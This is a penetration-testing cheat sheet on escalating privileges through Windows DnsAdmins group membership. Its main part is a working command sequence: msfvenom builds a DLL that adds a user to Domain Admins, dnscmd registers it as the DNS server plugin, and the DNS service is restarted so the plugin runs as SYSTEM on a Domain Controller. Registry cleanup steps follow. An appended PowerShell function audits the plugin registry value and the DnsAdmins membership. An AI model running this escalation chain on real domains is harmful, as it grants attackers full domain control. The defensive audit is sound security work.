DnsAdmins

ABOUT

Members of the DnsAdmins group can access DNS information within the network. The Windows DNS service allows custom plugins, which can execute functions to resolve name queries beyond the locally hosted DNS zones. Since the DNS service operates with NT AUTHORITY\SYSTEM privileges, membership in this group can be abused to escalate privileges on a Domain Controller or on a dedicated DNS server for the domain. The built-in dnscmd utility can be used to set the path of the plugin DLL, which the DNS service loads the next time it starts.

Importing custom plugin

Generating the malicious DLL

msfvenom -p windows/x64/exec cmd='net group "domain admins" ven17 /add /domain' -f dll -o adduser.dll

Starting a local HTTP server

python3 -m http.server 1337

Loading the DLL

You should be a member of the DnsAdmins group for this step to work.

C:\> dnscmd.exe /config /serverlevelplugindll C:\Users\ven17\Desktop\adduser.dll
  • If successful: Registry property serverlevelplugindll successfully reset.

Restart DNS Service

C:\> sc.exe stop dns
C:\> sc.exe start dns

Confirm Admin Privileges

PS C:\> net group "Domain Admins" /dom

Cleanup

Confirming the registry value was added

C:\> reg query \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Delete the registry value

C:\> reg delete \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

Restart DNS Service

C:\> sc.exe start dns
C:\> sc query dns
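As an added defender's check that is not part of the original page, the PowerShell function below audits the ServerLevelPluginDll value that the steps above set, hashes the DLL it points to, and lists who can set it (DnsAdmins members), covering both the import and the cleanup sections. It assumes it runs locally on the DNS server with read access to HKLM and that the RSAT ActiveDirectory module is installed for the group lookup; the function name and severity labels are constructed for this example.

```powershell
# Added audit example (not from the original page). Runs on the DNS server itself.
function Test-DnsServerPluginDll {
    $keyPath   = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    $valueName = 'ServerLevelPluginDll'

    # Read the value dnscmd /serverlevelplugindll writes; absent is the expected state.
    $plugin = Get-ItemProperty -Path $keyPath -Name $valueName -ErrorAction SilentlyContinue

    $result = [ordered]@{
        Server        = $env:COMPUTERNAME
        PluginDllSet  = ($null -ne $plugin)
        PluginDllPath = $null
        DllExists     = $false
        DllSha256     = $null
        Severity      = 'OK'          # constructed label: OK / Review / High
    }

    if ($result.PluginDllSet) {
        $path = $plugin.$valueName
        $result.PluginDllPath = $path
        $result.DllExists = Test-Path -LiteralPath $path
        if ($result.DllExists) {
            # Hash the DLL so the finding can be matched against known files later.
            $result.DllSha256 = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        }
        # Any plugin is worth review; one outside the Windows directory
        # (for example under a user profile, as in the walkthrough) is a high finding.
        $inSystemDir = $path -like "$env:SystemRoot\*"
        $result.Severity = if ($inSystemDir) { 'Review' } else { 'High' }
    }

    # Who is able to set the value: DnsAdmins members (needs the ActiveDirectory module).
    try {
        $members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive -ErrorAction Stop |
            Select-Object -ExpandProperty SamAccountName
        $result['DnsAdminsMembers'] = ($members -join ', ')
    } catch {
        $result['DnsAdminsMembers'] = "unavailable: $($_.Exception.Message)"
    }

    [pscustomobject]$result
}

Test-DnsServerPluginDll | Format-List
```

A clean server reports PluginDllSet as False; after the cleanup section's reg delete and service restart, rerunning the function should return to that state.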